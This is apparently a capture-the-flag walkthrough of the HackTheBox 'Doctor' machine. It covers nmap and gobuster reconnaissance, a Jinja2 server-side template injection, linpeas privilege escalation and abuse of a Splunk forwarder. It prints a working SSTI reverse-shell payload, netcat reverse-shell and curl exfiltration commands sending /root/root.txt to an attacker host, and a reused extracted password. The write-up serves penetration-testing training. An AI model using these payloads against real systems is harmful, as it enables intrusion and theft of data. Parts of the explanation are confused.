Doctor HackTheBox Guide

Welcome to HackingVision, today we will show you how to exploit the HackTheBox (Doctor) challange from https://hackthebox.eu

First we need to do some reconesenice on our target. Lets see what ports are open on the targets system by fireing up nmap.

As you can see from the screen shot below nmap found open ports 22/tcp, 80/tcp and 8089/tcp open on the targets webserver.

Port meaning

Port 22/tcp open port means that the targets webserver is running SSH service.

Port 80/tcp open port means that the targets webserver is running Apache.

Port 8089 port is open because the webserver is running Splunkd.

Splunk (big data analysis software) uses the following ports by default:
514 - network input port
8000 - web port (clients accessing the Splunk search page)
8080 - index replication port
8089 - management port (splunkd, aslo used by deployment server)
9997 - indexing port (web interface)
9998 - SSL port

https://www.speedguide.net/port.php?port=8089

8089/tcp open ssl/http Splunkd httpd

Lets take what we learnt from our nmap scan if the webserver has port 80 open it may be hosting a website or a web application.

If we go to the targets IP in a web browser we will be presented with a webpage that the targets webserver is running.

Lets take a deeper look the website has an email address attached to it. If we go back to our nmap scan and take note of open port 8089 we can find that the targets webserver runs a service called Splunkd. Port 8089 is the default Splunk management port.

Lets took a closer took at the email address linked in the websites main page. info@doctors.htb we can see that the main TLD of the email address is doctors.htb.

Now lets enter the information for this domain in our /etc/hosts file in Kali Linux. The hosts file in Linux is used to connect with hostnames and IP addresses.

Open /etc/host file in Kali Linux using the following command.

nano /etc/hosts

So we know what the IPv4 address is of the doctor website. Lets add it in our /etc/hosts file.

When we first open our hosts file it will show your networks local information listed. Modify /etc/hosts and add doctors.htb domain and its IPv4 address below your networks local host infomation.

Now when we load the doctors.htb website we are presented with a login page. This is because the /etc/hosts file is used to map domain names to IP addresses since we have mapped the IP address for this domain in our hosts file we can see that the splunkd server is running an email service because thats what the websites DNS servers resolved.

The screenshot below shows Doctor Secure Messaging this portal is used to manage secure messaging within the doctors.htb website.

 

If we try and login we will be presented with a blank page however we are logged in as we can see a Logout button in the right hand on the websites menu.

Lets take a deeper look at the webservers structure we can do this by using a tool called gobuster.

Gobuster is a tool used to brute-force:

  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).
  • Virtual Host names on target web servers.
  • Open Amazon S3 buckets

https://github.com/OJ/gobuster

Open a new terminal and use the following command to list dirs on the targets webserver.

gobuster dir --url http://doctors.htb -w /usr/share/wordlists/dirb/common.txt

As we can see from the screenshot below dirbuster found that doctors.htb has the following directorys.

/account

/archive

/home

/login

/logout

/register

/server-status (Status: 403)

If we open a web browser and go to doctors.htb/archive we are presented with a blank page.

Lets take a look at the source code for http://doctors.htb/archive we can do this by using the view-source: tag

To view the page source go to

view-source:http://doctors.htb/archive

As we can see from the screenshot below the page source code lists some html code of the websites page title.

Lets try and enter some SSTI payloads SSTI stands for Server side template injection.

A server-side template injection happens when an attacker uses native template syntax to inject a malicious payload into a template, that is then executed by the server-side.

SSTI attacks are not to be compared with XSS attacks they are different as they target the webservers internals to levrage Remote Code Execution (RCE).

 

You can read more about SSTI Server Side Template Injection here: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

 

We will use the following payload to check if the website login is vulnrable to SSTI attacks.

{{7*7}}

If you take a look at the screenshot below we can see that we were able to create a post using our SSTI payload.

Now if we look at the websites source code something has changed we now have a new title called 49 why because 7*7 = 49 we specified this in our payload.

Lets try to exploit the webserver using metasploit to do this we need to inject a SSTI payload that will open port 4444 on the targets webserver. 4444 (TCP/UDP) is the default listener port for Metasploit.

To do this we need to create a New Post in the Doctor Secure Messaging and inject our payload. The payload will tell the webserver using bash to open up port 4444 on the IP address 10.10.14.27.

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'bash -i >& /dev/tcp/10.10.14.27/4444 0>&1'").read()}}{%endif%}{%endfor%}

In the screenshot below we can see our SSTI payload displayed in the targets Secure Messaging portal.

 

Now lets take a look at the source code again it looks the same as when we injected the payload {{7*7}} this means that the webserver is accepting our SSTI payloads.

Now we are going to start netcat and tell the program to start listening on port 4444 we can do this by opening up a new terminal in Kali Linux and entering the following command.

nc -lnvp 4444

Command breakdown: nc = netcat -l tells netcat to set listen mode for inbound connections. – n tells netcat to use numeric only IP address no DNS -v sets verbose mode in netcat you can use -vv to be more verbose. -p tells netcat what local port number to listen on.

Now that netcat is listening on port 4444.

We need to download linpeas.

Linpeas is a tool that we can use to launch a privilage escalation attack against the target webserver.

From /tmp folder we can use wget http://10.10.14.38:8000/linpeas.sh to download linpeas.

We also need to start a http server we can do this by opening up another terminal and entering the command.

sudo python3 -m http.server

You will be asked to provide your password for Kali Linux to start the http server service once the http server is started it will open up a new port 8000.

Now that linpeas is downloaded we need to make it executable use the following command to make linpeas executable if we don’t the right permissions linpeas won’t be able to run correctly.

To make linpeas executable use the following command from the /tmp directory.

chmod +x linpeas.sh

Once we launch linpeas the tool will start listening and caching writable folders.

Once linpeas has cached all writable directorys it will then try and find any passwords inside logs.

As you can see from the screenshot below linpeas found a password or an email in this case the information found by linpeas is a password (Guitar123).

We also see that a password attempt for the user shaun from IP address 10.10.14.2 for a user account called ‘shaun’ and that Username and password was successfully validated for ‘root’.

Once linpeas has finished we will see that we have been spawned into a shell for web@doctor. Lets take the information from our linpeas scan to spawn a new bash shell.

To do this we must be in super usermode we can enter superuser mode using the command.

su shaun

Enter the password ‘Guitar123’ that we extracted from the target server using linpeas then use whoami command to display the current user.

Enter command whoami to display current user.

whoami

As you can see from the screenshot below the current user is ‘shaun’. Lets cd into shaun’s home directory we can do this using command

cd /home/shaun

Now that we are inside shaun’s home directory we can see that shaun has a file called user.txt lets cat this file to see its contents.

cat user.txt

Lets find out where the splunk is located use the command below to find where splunk is located.

whereis splunk

The output tells us that splunk is located in the /opt/splunkforwarder/bin/splunk we can also find the splunk version by using the following command.

/opt/splunkforwarder/bin/splunk --version

The terminals output tells us that version 8.0.5 is used on the target webserver.

Now we can preform Local privilege escalation, and or remote code execution, through Splunk Universal Forwarder (UF) misconfigurations. To do this we need a tool called SplunkWisperer2.

https://github.com/cnotin/SplunkWhisperer2

 

Using SplunkWisperer2 we will connect to the host and inject some payloads.

In your terminal enter the following commands to launch SplunkWhisperer2 agasint the target webserver.

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.27 --username shaun --password "Guitar123" --payload "nc.traditional -e /bin/bash 10.10.14.27 5555"
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.27 --username shaun --password "Guitar123" --payload "curl -F 'data=@/root/root.txt' http://10.10.14.27:5555"

Read more on Abusing Splunk Forwarders for RCE and Persistance here: https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/

In a new terminal launch netcat and tell the program to start listening on local port 5555. We can do this using the following command.

nc -lnvp 5555

As we can see in the screenshot below netcat started listening on port5555 and found a flag .